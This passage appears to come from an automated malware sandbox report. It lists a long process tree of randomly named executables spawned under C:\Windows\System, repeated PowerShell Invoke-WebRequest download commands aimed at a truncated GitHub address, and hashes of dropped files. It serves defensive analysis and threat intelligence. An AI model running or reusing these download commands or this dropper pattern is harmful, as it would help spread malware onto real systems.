PID:8588

C:\Windows\System\bIEztwA.exe
C:\Windows\System\bIEztwA.exe
2⤵
PID:8580

C:\Windows\System\OUUZfVT.exe
C:\Windows\System\OUUZfVT.exe
2⤵
PID:8696

C:\Windows\System\gHumxju.exe
C:\Windows\System\gHumxju.exe
2⤵
PID:8688

C:\Windows\System\QYdndiG.exe
C:\Windows\System\QYdndiG.exe
2⤵
PID:8704

C:\Windows\System\lGijLez.exe
C:\Windows\System\lGijLez.exe
2⤵
PID:8760

C:\Windows\System\xRShDHm.exe
C:\Windows\System\xRShDHm.exe
2⤵
PID:8792

C:\Windows\System\MWkByBa.exe
C:\Windows\System\MWkByBa.exe
2⤵
PID:8800

C:\Windows\System\XTGrbgv.exe
C:\Windows\System\XTGrbgv.exe
2⤵
PID:8808

C:\Windows\System\fcYkJup.exe
C:\Windows\System\fcYkJup.exe
2⤵
PID:8784

C:\Windows\System\zozWckJ.exe
C:\Windows\System\zozWckJ.exe
2⤵
PID:8776

C:\Windows\System\uIelrpP.exe
C:\Windows\System\uIelrpP.exe
2⤵
PID:8768

C:\Windows\System\vgImyRu.exe
C:\Windows\System\vgImyRu.exe
2⤵
PID:8816

C:\Windows\System\hCPkAqh.exe
C:\Windows\System\hCPkAqh.exe
2⤵
PID:8832

C:\Windows\System\CkQizHk.exe
C:\Windows\System\CkQizHk.exe
2⤵
PID:8824

C:\Windows\System\JDJYkGr.exe
C:\Windows\System\JDJYkGr.exe
2⤵
PID:8752

C:\Windows\System\DKBTOqW.exe
C:\Windows\System\DKBTOqW.exe
2⤵
PID:8744

C:\Windows\System\mbcafsd.exe
C:\Windows\System\mbcafsd.exe
2⤵
PID:8736

C:\Windows\System\WRqRPws.exe
C:\Windows\System\WRqRPws.exe
2⤵
PID:8728

C:\Windows\System\ApIDOZm.exe
C:\Windows\System\ApIDOZm.exe
2⤵
PID:8720

C:\Windows\System\fIWodfW.exe
C:\Windows\System\fIWodfW.exe
2⤵
PID:8712

C:\Windows\System\XgOUudf.exe
C:\Windows\System\XgOUudf.exe
2⤵
PID:8924

C:\Windows\System\wxooSSk.exe
C:\Windows\System\wxooSSk.exe
2⤵
PID:8916

C:\Windows\System\FJtShSW.exe
C:\Windows\System\FJtShSW.exe
2⤵
PID:8908

C:\Windows\System\cDsbamM.exe
C:\Windows\System\cDsbamM.exe
2⤵
PID:8900

C:\Windows\System\vXoepko.exe
C:\Windows\System\vXoepko.exe
2⤵
PID:8892

C:\Windows\System\VHzoAdY.exe
C:\Windows\System\VHzoAdY.exe
2⤵
PID:8884

C:\Windows\System\FQpLfRy.exe
C:\Windows\System\FQpLfRy.exe
2⤵
PID:8876

C:\Windows\System\nfJsXGj.exe
C:\Windows\System\nfJsXGj.exe
2⤵
PID:8868

C:\Windows\System\dvaNWEU.exe
C:\Windows\System\dvaNWEU.exe
2⤵
PID:8952

C:\Windows\System\xUPpMPV.exe
C:\Windows\System\xUPpMPV.exe
2⤵
PID:8944

C:\Windows\System\uwKnzHb.exe
C:\Windows\System\uwKnzHb.exe
2⤵
PID:9104

C:\Windows\System\LFTlYyy.exe
C:\Windows\System\LFTlYyy.exe
2⤵
PID:9096

C:\Windows\System\gNXRjWV.exe
C:\Windows\System\gNXRjWV.exe
2⤵
PID:9088

C:\Windows\System\NtdLjHp.exe
C:\Windows\System\NtdLjHp.exe
2⤵
PID:9080

C:\Windows\System\OzVGQqL.exe
C:\Windows\System\OzVGQqL.exe
2⤵
PID:9264

C:\Windows\System\rVxpyIj.exe
C:\Windows\System\rVxpyIj.exe
2⤵
PID:9780

C:\Windows\System\YKhLygD.exe
C:\Windows\System\YKhLygD.exe
2⤵
PID:9772

C:\Windows\System\FcblbXY.exe
C:\Windows\System\FcblbXY.exe
2⤵
PID:9764

C:\Windows\System\QGlzkQD.exe
C:\Windows\System\QGlzkQD.exe
2⤵
PID:9756

C:\Windows\System\xedVsMN.exe
C:\Windows\System\xedVsMN.exe
2⤵
PID:9748

C:\Windows\System\adAjfrM.exe
C:\Windows\System\adAjfrM.exe
2⤵
PID:9740

C:\Windows\System\OjcciTY.exe
C:\Windows\System\OjcciTY.exe
2⤵
PID:9732

C:\Windows\System\wxrvfWm.exe
C:\Windows\System\wxrvfWm.exe
2⤵
PID:9724

C:\Windows\System\sGjBGeE.exe
C:\Windows\System\sGjBGeE.exe
2⤵
PID:9712

C:\Windows\System\gocwBZH.exe
C:\Windows\System\gocwBZH.exe
2⤵
PID:9304

C:\Windows\System\mMNyhDn.exe
C:\Windows\System\mMNyhDn.exe
2⤵
PID:9296

C:\Windows\System\GpbBaYW.exe
C:\Windows\System\GpbBaYW.exe
2⤵
PID:9280

C:\Windows\System\cGUmcEu.exe
C:\Windows\System\cGUmcEu.exe
2⤵
PID:9272

C:\Windows\System\JlnxnHU.exe
C:\Windows\System\JlnxnHU.exe
2⤵
PID:9880

C:\Windows\System\preYHqd.exe
C:\Windows\System\preYHqd.exe
2⤵
PID:9888

C:\Windows\System\HtvESXG.exe
C:\Windows\System\HtvESXG.exe
2⤵
PID:9872

C:\Windows\System\MalursC.exe
C:\Windows\System\MalursC.exe
2⤵
PID:9864

C:\Windows\System\MiOtEHp.exe
C:\Windows\System\MiOtEHp.exe
2⤵
PID:9856

C:\Windows\System\sadcEKa.exe
C:\Windows\System\sadcEKa.exe
2⤵
PID:9848

C:\Windows\System\OraNDnX.exe
C:\Windows\System\OraNDnX.exe
2⤵
PID:9840

C:\Windows\System\JhMdZBI.exe
C:\Windows\System\JhMdZBI.exe
2⤵
PID:9832

C:\Windows\System\kQqQPAp.exe
C:\Windows\System\kQqQPAp.exe
2⤵
PID:9824

C:\Windows\System\ChsQZOz.exe
C:\Windows\System\ChsQZOz.exe
2⤵
PID:9816

C:\Windows\System\ZKZOOmY.exe
C:\Windows\System\ZKZOOmY.exe
2⤵
PID:9808

C:\Windows\System\yRUqYog.exe
C:\Windows\System\yRUqYog.exe
2⤵
PID:9800

C:\Windows\System\QZlJbmo.exe
C:\Windows\System\QZlJbmo.exe
2⤵
PID:9976

C:\Windows\System\HrOBYcy.exe
C:\Windows\System\HrOBYcy.exe
2⤵
PID:9968

C:\Windows\System\mWZcWvB.exe
C:\Windows\System\mWZcWvB.exe
2⤵
PID:9960

C:\Windows\System\uIZrOrK.exe
C:\Windows\System\uIZrOrK.exe
2⤵
PID:9952

C:\Windows\System\JVtmMDm.exe
C:\Windows\System\JVtmMDm.exe
2⤵
PID:9944

C:\Windows\System\rfKLPFP.exe
C:\Windows\System\rfKLPFP.exe
2⤵
PID:9936

C:\Windows\System\KkgzheN.exe
C:\Windows\System\KkgzheN.exe
2⤵
PID:9928

C:\Windows\System\BluPgvA.exe
C:\Windows\System\BluPgvA.exe
2⤵
PID:9904

C:\Windows\System\FnRfrSp.exe
C:\Windows\System\FnRfrSp.exe
2⤵
PID:10140

C:\Windows\System\HftZkUA.exe
C:\Windows\System\HftZkUA.exe
2⤵
PID:10128

C:\Windows\System\xjjjmqy.exe
C:\Windows\System\xjjjmqy.exe
2⤵
PID:10120

C:\Windows\System\dGbkvjR.exe
C:\Windows\System\dGbkvjR.exe
2⤵
PID:10100

C:\Windows\System\bELlGEW.exe
C:\Windows\System\bELlGEW.exe
2⤵
PID:10088

C:\Windows\System\EFDIPmR.exe
C:\Windows\System\EFDIPmR.exe
2⤵
PID:10076

C:\Windows\System\AbhbAcu.exe
C:\Windows\System\AbhbAcu.exe
2⤵
PID:10068

C:\Windows\System\ikRSKEV.exe
C:\Windows\System\ikRSKEV.exe
2⤵
PID:10060

C:\Windows\System\IOAxOuo.exe
C:\Windows\System\IOAxOuo.exe
2⤵
PID:10052

C:\Windows\System\SwDPIXw.exe
C:\Windows\System\SwDPIXw.exe
2⤵
PID:10044

C:\Windows\System\KtdmlVy.exe
C:\Windows\System\KtdmlVy.exe
2⤵
PID:10036

C:\Windows\System\GUSJzFP.exe
C:\Windows\System\GUSJzFP.exe
2⤵
PID:10020

C:\Windows\System\KZIpTKO.exe
C:\Windows\System\KZIpTKO.exe
2⤵
PID:10340

C:\Windows\System\voPcIZw.exe
C:\Windows\System\voPcIZw.exe
2⤵
PID:10332

C:\Windows\System\KIhYgyv.exe
C:\Windows\System\KIhYgyv.exe
2⤵
PID:10324

C:\Windows\System\LbTMbGD.exe
C:\Windows\System\LbTMbGD.exe
2⤵
PID:10316

C:\Windows\System\poiwPps.exe
C:\Windows\System\poiwPps.exe
2⤵
PID:10308

C:\Windows\System\OHBFEVS.exe
C:\Windows\System\OHBFEVS.exe
2⤵
PID:10296

C:\Windows\System\WCsnJMz.exe
C:\Windows\System\WCsnJMz.exe
2⤵
PID:10288

C:\Windows\System\EGSmgPT.exe
C:\Windows\System\EGSmgPT.exe
2⤵
PID:10268

C:\Windows\System\ICmMOtx.exe
C:\Windows\System\ICmMOtx.exe
2⤵
PID:10260

C:\Windows\System\jTzQlUo.exe
C:\Windows\System\jTzQlUo.exe
2⤵
PID:10252

C:\Windows\System\MmnmsPU.exe
C:\Windows\System\MmnmsPU.exe
2⤵
PID:10244

C:\Windows\System\trYfOsr.exe
C:\Windows\System\trYfOsr.exe
2⤵
PID:10232

C:\Windows\System\obxCAuw.exe
C:\Windows\System\obxCAuw.exe
2⤵
PID:10224

C:\Windows\System\yzHDcTd.exe
C:\Windows\System\yzHDcTd.exe
2⤵
PID:10216

C:\Windows\System\gBvTiOB.exe
C:\Windows\System\gBvTiOB.exe
2⤵
PID:10204

C:\Windows\System\VRVIxmc.exe
C:\Windows\System\VRVIxmc.exe
2⤵
PID:10196

C:\Windows\System\puQXuzn.exe
C:\Windows\System\puQXuzn.exe
2⤵
PID:10188

C:\Windows\System\mhfmcyA.exe
C:\Windows\System\mhfmcyA.exe
2⤵
PID:10180

C:\Windows\System\JhPCkwJ.exe
C:\Windows\System\JhPCkwJ.exe
2⤵
PID:10172

C:\Windows\System\whvmkQu.exe
C:\Windows\System\whvmkQu.exe
2⤵
PID:10164

C:\Windows\System\zOAXkRJ.exe
C:\Windows\System\zOAXkRJ.exe
2⤵
PID:10156

C:\Windows\System\ELybHkG.exe
C:\Windows\System\ELybHkG.exe
2⤵
PID:10148

C:\Windows\System\qVozLGs.exe
C:\Windows\System\qVozLGs.exe
2⤵
PID:10724

C:\Windows\System\RyzWyBd.exe
C:\Windows\System\RyzWyBd.exe
2⤵
PID:10716

C:\Windows\System\wHvyEPT.exe
C:\Windows\System\wHvyEPT.exe
2⤵
PID:10708

C:\Windows\System\fUoGxhc.exe
C:\Windows\System\fUoGxhc.exe
2⤵
PID:10700

C:\Windows\System\zqkowsj.exe
C:\Windows\System\zqkowsj.exe
2⤵
PID:10692

C:\Windows\System\YpYvoXf.exe
C:\Windows\System\YpYvoXf.exe
2⤵
PID:10680

C:\Windows\System\FZrpRNu.exe
C:\Windows\System\FZrpRNu.exe
2⤵
PID:10668

C:\Windows\System\FdDECDN.exe
C:\Windows\System\FdDECDN.exe
2⤵
PID:10660

C:\Windows\System\uwmHVvV.exe
C:\Windows\System\uwmHVvV.exe
2⤵
PID:10652

C:\Windows\System\ZdooYpq.exe
C:\Windows\System\ZdooYpq.exe
2⤵
PID:10644

C:\Windows\System\FVKtNLc.exe
C:\Windows\System\FVKtNLc.exe
2⤵
PID:10636

C:\Windows\System\SEtwwDK.exe
C:\Windows\System\SEtwwDK.exe
2⤵
PID:10628

C:\Windows\System\vifIaVa.exe
C:\Windows\System\vifIaVa.exe
2⤵
PID:10620

C:\Windows\System\JYPVvPF.exe
C:\Windows\System\JYPVvPF.exe
2⤵
PID:10612

C:\Windows\System\iSeNJJF.exe
C:\Windows\System\iSeNJJF.exe
2⤵
PID:10604

C:\Windows\System\iwQWpGY.exe
C:\Windows\System\iwQWpGY.exe
2⤵
PID:10596

C:\Windows\System\MChCjBY.exe
C:\Windows\System\MChCjBY.exe
2⤵
PID:10588

C:\Windows\System\znywoPk.exe
C:\Windows\System\znywoPk.exe
2⤵
PID:10580

C:\Windows\System\vYGQZJh.exe
C:\Windows\System\vYGQZJh.exe
2⤵
PID:10572

C:\Windows\System\QMtYOHc.exe
C:\Windows\System\QMtYOHc.exe
2⤵
PID:10564

C:\Windows\System\zhdhabg.exe
C:\Windows\System\zhdhabg.exe
2⤵
PID:10556

C:\Windows\System\icJhCAA.exe
C:\Windows\System\icJhCAA.exe
2⤵
PID:10548

C:\Windows\System\PhzpDSR.exe
C:\Windows\System\PhzpDSR.exe
2⤵
PID:10540

C:\Windows\System\lojKuEg.exe
C:\Windows\System\lojKuEg.exe
2⤵
PID:10532

C:\Windows\System\PgZEqcO.exe
C:\Windows\System\PgZEqcO.exe
2⤵
PID:10524

C:\Windows\System\KWvhNzx.exe
C:\Windows\System\KWvhNzx.exe
2⤵
PID:10516

C:\Windows\System\arcyyqc.exe
C:\Windows\System\arcyyqc.exe
2⤵
PID:10508

C:\Windows\System\tbBEWer.exe
C:\Windows\System\tbBEWer.exe
2⤵
PID:10500

C:\Windows\System\Tfnytva.exe
C:\Windows\System\Tfnytva.exe
2⤵
PID:10492

C:\Windows\System\IiQWNpP.exe
C:\Windows\System\IiQWNpP.exe
2⤵
PID:10484

C:\Windows\System\SrhptRV.exe
C:\Windows\System\SrhptRV.exe
2⤵
PID:10476

C:\Windows\System\tEEmEoZ.exe
C:\Windows\System\tEEmEoZ.exe
2⤵
PID:10468

C:\Windows\System\MqoqrML.exe
C:\Windows\System\MqoqrML.exe
2⤵
PID:10460

C:\Windows\System\pVzliUN.exe
C:\Windows\System\pVzliUN.exe
2⤵
PID:10452

C:\Windows\System\NXTZnIO.exe
C:\Windows\System\NXTZnIO.exe
2⤵
PID:10444

C:\Windows\System\XsdwVkW.exe
C:\Windows\System\XsdwVkW.exe
2⤵
PID:10428

C:\Windows\System\XhCudio.exe
C:\Windows\System\XhCudio.exe
2⤵
PID:10420

C:\Windows\System\EfHrRvy.exe
C:\Windows\System\EfHrRvy.exe
2⤵
PID:10412

C:\Windows\System\nsXEFpu.exe
C:\Windows\System\nsXEFpu.exe
2⤵
PID:10404

C:\Windows\System\EAdSTrY.exe
C:\Windows\System\EAdSTrY.exe
2⤵
PID:10396

C:\Windows\System\SigRaih.exe
C:\Windows\System\SigRaih.exe
2⤵
PID:10388

C:\Windows\System\QCjwWEw.exe
C:\Windows\System\QCjwWEw.exe
2⤵
PID:10380

C:\Windows\System\TTjYgpn.exe
C:\Windows\System\TTjYgpn.exe
2⤵
PID:10372

C:\Windows\System\ywXSbed.exe
C:\Windows\System\ywXSbed.exe
2⤵
PID:10364

C:\Windows\System\rShMyfg.exe
C:\Windows\System\rShMyfg.exe
2⤵
PID:10356

C:\Windows\System\BYlbgos.exe
C:\Windows\System\BYlbgos.exe
2⤵
PID:10844

C:\Windows\System\WTVJHmv.exe
C:\Windows\System\WTVJHmv.exe
2⤵
PID:10836

C:\Windows\System\kIkFAmp.exe
C:\Windows\System\kIkFAmp.exe
2⤵
PID:10828

C:\Windows\System\eOPctWd.exe
C:\Windows\System\eOPctWd.exe
2⤵
PID:10820

C:\Windows\System\rNHORgd.exe
C:\Windows\System\rNHORgd.exe
2⤵
PID:10812

C:\Windows\System\ZfMUETm.exe
C:\Windows\System\ZfMUETm.exe
2⤵
PID:10804

C:\Windows\System\HNHwBeV.exe
C:\Windows\System\HNHwBeV.exe
2⤵
PID:10752

C:\Windows\System\WBZPIqP.exe
C:\Windows\System\WBZPIqP.exe
2⤵
PID:10736

C:\Windows\System\iQyRuaP.exe
C:\Windows\System\iQyRuaP.exe
2⤵
PID:11008

C:\Windows\System\JIiLXEp.exe
C:\Windows\System\JIiLXEp.exe
2⤵
PID:11000

C:\Windows\System\WQoaTNM.exe
C:\Windows\System\WQoaTNM.exe
2⤵
PID:11236

C:\Windows\System\PrBMbmJ.exe
C:\Windows\System\PrBMbmJ.exe
2⤵
PID:11228

C:\Windows\System\cHGuiFY.exe
C:\Windows\System\cHGuiFY.exe
2⤵
PID:11220

C:\Windows\System\iItasdX.exe
C:\Windows\System\iItasdX.exe
2⤵
PID:11212

C:\Windows\System\JOtPurA.exe
C:\Windows\System\JOtPurA.exe
2⤵
PID:11204

C:\Windows\System\UuBKztS.exe
C:\Windows\System\UuBKztS.exe
2⤵
PID:11024

C:\Windows\System\eGNYwXZ.exe
C:\Windows\System\eGNYwXZ.exe
2⤵
PID:11016

C:\Windows\System\YBTanoP.exe
C:\Windows\System\YBTanoP.exe
2⤵
PID:10992

C:\Windows\System\PqNEzDW.exe
C:\Windows\System\PqNEzDW.exe
2⤵
PID:10984

C:\Windows\System\FFkqSWA.exe
C:\Windows\System\FFkqSWA.exe
2⤵
PID:10976

C:\Windows\System\YaylisJ.exe
C:\Windows\System\YaylisJ.exe
2⤵
PID:10968

C:\Windows\System\JBPLpAq.exe
C:\Windows\System\JBPLpAq.exe
2⤵
PID:10960

C:\Windows\System\DSEpZPh.exe
C:\Windows\System\DSEpZPh.exe
2⤵
PID:10912

C:\Windows\System\mzqRucn.exe
C:\Windows\System\mzqRucn.exe
2⤵
PID:10904

C:\Windows\System\IpsmTQH.exe
C:\Windows\System\IpsmTQH.exe
2⤵
PID:10896

C:\Windows\System\MAzMBpW.exe
C:\Windows\System\MAzMBpW.exe
2⤵
PID:11564

C:\Windows\System\IFESaMR.exe
C:\Windows\System\IFESaMR.exe
2⤵
PID:11640

C:\Windows\System\qlSxPrG.exe
C:\Windows\System\qlSxPrG.exe
2⤵
PID:11632

C:\Windows\System\wOkAGpQ.exe
C:\Windows\System\wOkAGpQ.exe
2⤵
PID:11624

C:\Windows\System\vpuhTVL.exe
C:\Windows\System\vpuhTVL.exe
2⤵
PID:11608

C:\Windows\System\yqOzexI.exe
C:\Windows\System\yqOzexI.exe
2⤵
PID:11588

C:\Windows\System\TJKkTxy.exe
C:\Windows\System\TJKkTxy.exe
2⤵
PID:11580

C:\Windows\System\qRnhJBk.exe
C:\Windows\System\qRnhJBk.exe
2⤵
PID:11572

C:\Windows\System\qGNPmor.exe
C:\Windows\System\qGNPmor.exe
2⤵
PID:11656

C:\Windows\System\OBiWqEq.exe
C:\Windows\System\OBiWqEq.exe
2⤵
PID:11700

C:\Windows\System\hCYSpQM.exe
C:\Windows\System\hCYSpQM.exe
2⤵
PID:11716

C:\Windows\System\Bifwkxn.exe
C:\Windows\System\Bifwkxn.exe
2⤵
PID:11928

C:\Windows\System\rVXgvzZ.exe
C:\Windows\System\rVXgvzZ.exe
2⤵
PID:11920

C:\Windows\System\jXWKaqC.exe
C:\Windows\System\jXWKaqC.exe
2⤵
PID:11912

C:\Windows\System\QlZTjCV.exe
C:\Windows\System\QlZTjCV.exe
2⤵
PID:11904

C:\Windows\System\dcyswdW.exe
C:\Windows\System\dcyswdW.exe
2⤵
PID:12012

C:\Windows\System\KiRrQfQ.exe
C:\Windows\System\KiRrQfQ.exe
2⤵
PID:12004

C:\Windows\System\BQvqxdp.exe
C:\Windows\System\BQvqxdp.exe
2⤵
PID:11996

C:\Windows\System\oHhgqcR.exe
C:\Windows\System\oHhgqcR.exe
2⤵
PID:12148

C:\Windows\System\JiikdJJ.exe
C:\Windows\System\JiikdJJ.exe
2⤵
PID:12140

C:\Windows\System\xFCTyMn.exe
C:\Windows\System\xFCTyMn.exe
2⤵
PID:12132

C:\Windows\System\nsvCdrc.exe
C:\Windows\System\nsvCdrc.exe
2⤵
PID:12124

C:\Windows\System\rtspXAk.exe
C:\Windows\System\rtspXAk.exe
2⤵
PID:12116

C:\Windows\System\FDTxqyv.exe
C:\Windows\System\FDTxqyv.exe
2⤵
PID:12108

C:\Windows\System\CJbHQBU.exe
C:\Windows\System\CJbHQBU.exe
2⤵
PID:12100

C:\Windows\System\SVfmTOw.exe
C:\Windows\System\SVfmTOw.exe
2⤵
PID:12092

C:\Windows\System\SnVHiTY.exe
C:\Windows\System\SnVHiTY.exe
2⤵
PID:12084

C:\Windows\System\kHcyKwA.exe
C:\Windows\System\kHcyKwA.exe
2⤵
PID:12076

C:\Windows\System\cWTcaIT.exe
C:\Windows\System\cWTcaIT.exe
2⤵
PID:12064

C:\Windows\System\VfyJUBl.exe
C:\Windows\System\VfyJUBl.exe
2⤵
PID:12056

C:\Windows\System\GPvzKJc.exe
C:\Windows\System\GPvzKJc.exe
2⤵
PID:12048

C:\Windows\System\yrbzcMG.exe
C:\Windows\System\yrbzcMG.exe
2⤵
PID:12040

C:\Windows\System\owyMruV.exe
C:\Windows\System\owyMruV.exe
2⤵
PID:12032

C:\Windows\System\hDWFxsY.exe
C:\Windows\System\hDWFxsY.exe
2⤵
PID:11988

C:\Windows\System\iflsViu.exe
C:\Windows\System\iflsViu.exe
2⤵
PID:11980

C:\Windows\System\jtdUUDl.exe
C:\Windows\System\jtdUUDl.exe
2⤵
PID:11972

C:\Windows\System\qYBNqxy.exe
C:\Windows\System\qYBNqxy.exe
2⤵
PID:11964

C:\Windows\System\JHaqRKR.exe
C:\Windows\System\JHaqRKR.exe
2⤵
PID:11956

C:\Windows\System\xweUIib.exe
C:\Windows\System\xweUIib.exe
2⤵
PID:11948

C:\Windows\System\sKotNAJ.exe
C:\Windows\System\sKotNAJ.exe
2⤵
PID:11940

C:\Windows\System\mIuVrqk.exe
C:\Windows\System\mIuVrqk.exe
2⤵
PID:11896

C:\Windows\System\VtGjdvV.exe
C:\Windows\System\VtGjdvV.exe
2⤵
PID:11888

C:\Windows\System\dpfHazJ.exe
C:\Windows\System\dpfHazJ.exe
2⤵
PID:11880

C:\Windows\System\wnwhyJj.exe
C:\Windows\System\wnwhyJj.exe
2⤵
PID:11872

C:\Windows\System\katDepJ.exe
C:\Windows\System\katDepJ.exe
2⤵
PID:11864

C:\Windows\System\iFjtNpG.exe
C:\Windows\System\iFjtNpG.exe
2⤵
PID:11856

C:\Windows\System\tTzoGrF.exe
C:\Windows\System\tTzoGrF.exe
2⤵
PID:11848

C:\Windows\System\rKcxKQT.exe
C:\Windows\System\rKcxKQT.exe
2⤵
PID:11840

C:\Windows\System\fSSkYNX.exe
C:\Windows\System\fSSkYNX.exe
2⤵
PID:11832

C:\Windows\System\uTxLwzj.exe
C:\Windows\System\uTxLwzj.exe
2⤵
PID:11824

C:\Windows\System\TlyZQLJ.exe
C:\Windows\System\TlyZQLJ.exe
2⤵
PID:11816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
1⤵
PID:3408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
1⤵
PID:3396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
1⤵
PID:3380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
1⤵
PID:3372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
1⤵
PID:3624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
1⤵
PID:3616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
1⤵
PID:3536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
1⤵
PID:3528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
1⤵
PID:3512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
1⤵
PID:3496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
1⤵
PID:3472

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d4c2b96c89c72dcaf382405850ea6086

SHA1
7e83e4febf325c710c77803bd73ee6f79b414822

SHA256
d4a8450e2676aafc93c6f089a9043a1ca70aacd3e3b99899bdd02a15a74b7665

SHA512
4770c1e759b20f1103c1f977fc9d1cba265bc80d79be89add39833488900f37987ee7503c622ec9e9e3a599cfdbb544233abd0431a2f966e6dd44283db61aecc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d4c2b96c89c72dcaf382405850ea6086

SHA1
7e83e4febf325c710c77803bd73ee6f79b414822

SHA256
d4a8450e2676aafc93c6f089a9043a1ca70aacd3e3b99899bdd02a15a74b7665

SHA512
4770c1e759b20f1103c1f977fc9d1cba265bc80d79be89add39833488900f37987ee7503c622ec9e9e3a599cfdbb544233abd0431a2f966e6dd44283db61aecc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d4c2b96c89c72dcaf382405850ea6086

SHA1
7e83e4febf325c710c77803bd73ee6f79b414822

SHA256
d4a8450e2676aafc93c6f089a9043a1ca70aacd3e3b99899bdd02a15a74b7665

SHA512
4770c1e759b20f1103c1f977fc9d1cba265bc80d79be89add39833488900f37987ee7503c622ec9e9e3a599cfdbb544233abd0431a2f966e6dd44283db61aecc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d4c2b96c89c72dcaf382405850ea6086

SHA1
7e83e4febf325c710c77803bd73ee6f79b414822

SHA256
d4a8450e2676aafc93c6f089a9043a1ca70aacd3e3b99899bdd02a15a74b7665

SHA512
4770c1e759b20f1103c1f977fc9d1cba265bc80d79be89add39833488900f37987ee7503c622ec9e9e3a599cfdbb544233abd0431a2f966e6dd44283db61aecc

Download Submit
C:\Windows\system\BkpbJeA.exe
MD5
100f3d23517d95b1cade18fcd4f2640d

SHA1
044b56d9ca8cd5ad836d85c224a8c6ee2826a767

SHA256
2d893737c1b966362e8eba7ba156239b4de940e1e563335e66344ba0bce0a432

SHA512
97e53e79b982fc1be7d55a3c0f543a4c0f1a31fcc8c3eff569dc8d8c97967565720461e7f3294738e0b31e65619e72d7af99ae8fc06bc25fca36cad8393f2a8b

Download Submit
C:\Windows\system\CLZGZLL.exe
MD5
c73c59997897b6004eb799e743c9ae83

SHA1
44a50dd46a8b8a776cc1db996697237c4029b754

SHA256
65867d483d4dfeedbe2a938a355a14d896efcd388e44d0ee6b5c896a33a1db9c

SHA512
80f436bed2a5d52a9df378ca4c33fee41998452bd791398c819d9911651fe29655a48ccce281ab9ce08b0e28edb11b0da15b8d5abc6307ab167c34ee0dc5458f

Download Submit
C:\Windows\system\DBADADF.exe
MD5
4fb2d26088fddef2f90ef170365c0bef

SHA1
7714f338a5081bbb2ac1e997919a52f6ceca5430

SHA256
ec5d283b07cba2fe0dcf9569293797ba8327b3bc797ba1705b33d355c8a06fed

SHA512
d3a2130e95b88f32792e0c729da26e5180be4b9443b250e79f1f08ded2b0d1abbf0cc2af7b682d220fd9d12a6d1365866df115afd4b5c1a992ae3f6e7d40027a

Download Submit
C:\Windows\system\FUUIzOA.exe
MD5
59418b256b77161ac8e2695ecfd12474

SHA1
83c514e12845c335e4bb46e342c48e4bc83461b8

SHA256
82501dcfcb12de7d44eaf0693b263f454e3694bd2c6c6bcd363df365588a349e

SHA512
dcf1ccad814adc9195406a58450389ef3186ae37fa9207d0b01702624528bbaa3847b4f3f338577452c62073c63983cdd64e63cbc3759224c73fc82c1a596266

Download Submit
C:\Windows\system\GMduHcM.exe
MD5
cf07b70d579d5c0cc4d4b16753b4c356

SHA1
3dfd3b724732245e2fad7d8d0d52f16aa7f75f96

SHA256
e42f442a0dc24f802531b14bd614fe74efd8a1985af823195d9f1cdb472c515d

SHA512
d8e033010a641911bbed4b21afecf7b39b4cb32d9f66ed15e77fdef322f503702718a7dcbe9ba9609b2244a36b58360609293d8613be12b90bc22a5603ff925a

Download Submit
C:\Windows\system\GqCUrub.exe
MD5
ad090334f50b8b3ef280b28f1db7a385

SHA1
dbe23475bd5c800505c908e18ff201bb50d18bb4

SHA256
6d30745b4f833f0034087ac0e8e7c0ec15c15bf96bb8fb76eda81ed78c031fc5

SHA512
cdb0e8f670331d22aa0ac999b15bba83dbec22375621d386f18efabec75e2d7a6ad36cd86374ebb4136618ca9fa593cde434cc3d3a6d99946ac41e79ff0b98c5

Download Submit
C:\Windows\system\HoZTZtS.exe
MD5
ca32a56349977608534174e43d71b91e

SHA1
c0ef1e32014ee2e4a286a4d06f9655e53d47033b

SHA256
58cf2e3ff6a6eb8ea86e07d1acdbda19dfb8dff93803e1962877c63176ab80a6

SHA512
ffd4d74b56891deaf3aa872164eac693b432cc6a9f796ccc1338d36771c2f34401d38fa334b05617722c565214afae362bcf2d9e689a36d7fc0b726dafe22566

Download Submit
C:\Windows\system\ILOfGqd.exe
MD5
8d2e8e8ef5f69aa2b37e609d3bc8ccad

SHA1
498aab62b36c3ad520fd1af46cec7f7ab2b4e22e

SHA256
37c59f150eba2629e94ecfc392e460623685943ae1c1ef745fb1b57a8e529242

SHA512
